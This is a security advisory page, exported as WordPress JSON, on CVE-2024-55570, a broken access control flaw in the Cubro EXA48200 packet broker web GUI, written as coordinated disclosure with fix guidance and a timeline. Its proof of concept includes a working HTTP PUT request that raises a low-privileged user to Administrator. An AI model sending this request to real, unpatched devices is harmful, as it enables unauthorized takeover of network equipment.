{"id":23733,"date":"2025-02-26T13:58:42","date_gmt":"2025-02-26T12:58:42","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2024-0014\/"},"modified":"2025-03-06T11:51:14","modified_gmt":"2025-03-06T10:51:14","slug":"usd-2024-0014","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2024-0014\/","title":{"rendered":"usd-2024-0014"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.4\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n<h1>usd-2024-14 | Cubro EXA48200<\/h1>\n<h1><\/h1>\n<p><strong>Product<\/strong>: Cubro EXA48200 Web GUI<br \/><strong>Affected Version<\/strong>: Build 20231025055018<br \/><strong>Vulnerability Type<\/strong>: Broken Access Control<br \/><strong>Security Risk<\/strong>: Critical<br \/><strong>Vendor<\/strong>: Cubro Network Visibility<br \/><strong>Vendor URL<\/strong>: <a href=\"https:\/\/www.cubro.com\" target=\"_blank\" rel=\"noopener\">https:\/\/www.cubro.com<\/a><br \/><strong>Vendor acknowledged vulnerability<\/strong>: Yes<br \/><strong>Vendor Status<\/strong>: Fixed in Firmware Version V5.0R14.5P4-V3.3R1<br \/><strong>CVE number<\/strong>: CVE-2024-55570<br \/><strong>CVE Link<\/strong>: <a href=\"https:\/\/www.cve.org\/CVERecord?id=CVE-2024-55570\" target=\"_blank\" rel=\"noopener\">https:\/\/www.cve.org\/CVERecord?id=CVE-2024-55570<\/a><br \/><strong>Advisory ID<\/strong>: usd-2024-14<\/p>\n<h3>Description<\/h3>\n<p>A broken access control vulnerability in the web GUI for the <em>Cubro EXA48200<\/em> network packet broker (build no. 20231025055018) allows remote authenticated users of the application to increase their privileges to <em>administrator<\/em> by sending a single HTTP PUT request.<\/p>\n<h3>Proof of Concept<\/h3>\n<p>As seen in the following screenshot, the user <strong>pentester_usd<\/strong> has low privileges. No administrative functionality can be accessed in the sidebar.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/02\/bac_1.png\" width=\"1229\" height=\"463\" alt=\"\" class=\"wp-image-23709 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/02\/bac_1.png 1229w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/02\/bac_1-980x369.png 980w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/02\/bac_1-480x181.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1229px, 100vw\" \/><\/p>\n<p>By sending an HTTP PUT request to the regular API endpoint used for e.g. password change, the user can set the attribute <strong>rolename<\/strong> within the JSON in the request body to <strong>Administrator<\/strong>:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">PUT<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/api\/user\/users<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">10.30.41.100<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Cookie<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">str=\"2|1:0|10:1726492201|3:str|44:ODJkNjU3MDdkMWZmNmEwNGYxNWZhMTQxZDA0ZmIzOTY=|c975395bdca560bb788ba7ecdbbe70ec379bd8a3d7cb32f1f3cf23ee744812c9\"<br \/><\/span><span class=\"err\" style=\"background: #263238;color: #ff5370\">[...]<br \/><\/span>{  \"pentester_usd\":{    \"auth_mode\":\"local\",    \"password\":\"&lt;REDACTED&gt;\",    \"rolename\":\"Administrator\"  }}<\/pre>\n<\/div>\n<p>As the following screenshot shows, the user now has full administrative capabilities. This includes the ability to modify the passwords of all other user accounts, enabling a full compromise of the web application.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/02\/bac_2.png\" width=\"1230\" height=\"480\" alt=\"\" class=\"wp-image-23711 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/02\/bac_2.png 1230w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/02\/bac_2-980x382.png 980w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/02\/bac_2-480x187.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1230px, 100vw\" \/><\/p>\n<h3>Fix<\/h3>\n<p>It is recommended to check user privileges server-side for every request that modifies data. It is not sufficient to simply not display sensitive functionality (such as a role change) within the GUI.<\/p>\n<h3>References<\/h3>\n<ul>\n<li><a href=\"https:\/\/owasp.org\/Top10\/A01_2021-Broken_Access_Control\" target=\"_blank\" rel=\"noopener\">https:\/\/owasp.org\/Top10\/A01_2021-Broken_Access_Control<\/a><\/li>\n<\/ul>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2024-09-23<\/strong>: Vulnerability identified by Tim W\u00f6rner of usd AG.<\/li>\n<li><strong>2024-10-04<\/strong>: Initial contact request sent to Cubro's support team.<\/li>\n<li><strong>2024-10-07<\/strong>: The vulnerability is disclosed via Cubro's technical support platform.<\/li>\n<li><strong>2024-11-04<\/strong>: The vulnerability is patched in Firmware V5.0R14.5P4-V3.3R1<\/li>\n<li><strong>2025-02-26<\/strong>: This advisory is published.<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Credits<\/h3>\n<p>This security vulnerability was identified by Tim W\u00f6rner of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2024-14 | Cubro EXA48200 Product: Cubro EXA48200 Web GUIAffected Version: Build 20231025055018Vulnerability Type: Broken Access ControlSecurity Risk: CriticalVendor: Cubro Network VisibilityVendor URL: https:\/\/www.cubro.comVendor acknowledged vulnerability: YesVendor Status: Fixed in Firmware Version V5.0R14.5P4-V3.3R1CVE number: CVE-2024-55570CVE Link: https:\/\/www.cve.org\/CVERecord?id=CVE-2024-55570Advisory ID: usd-2024-14 Description A broken access control vulnerability in the web GUI for the Cubro EXA48200 network packet broker [&hellip;]<\/p>\n","protected":false},"author":118,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-23733","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/23733","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=23733"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/23733\/revisions"}],"predecessor-version":[{"id":23755,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/23733\/revisions\/23755"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=23733"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}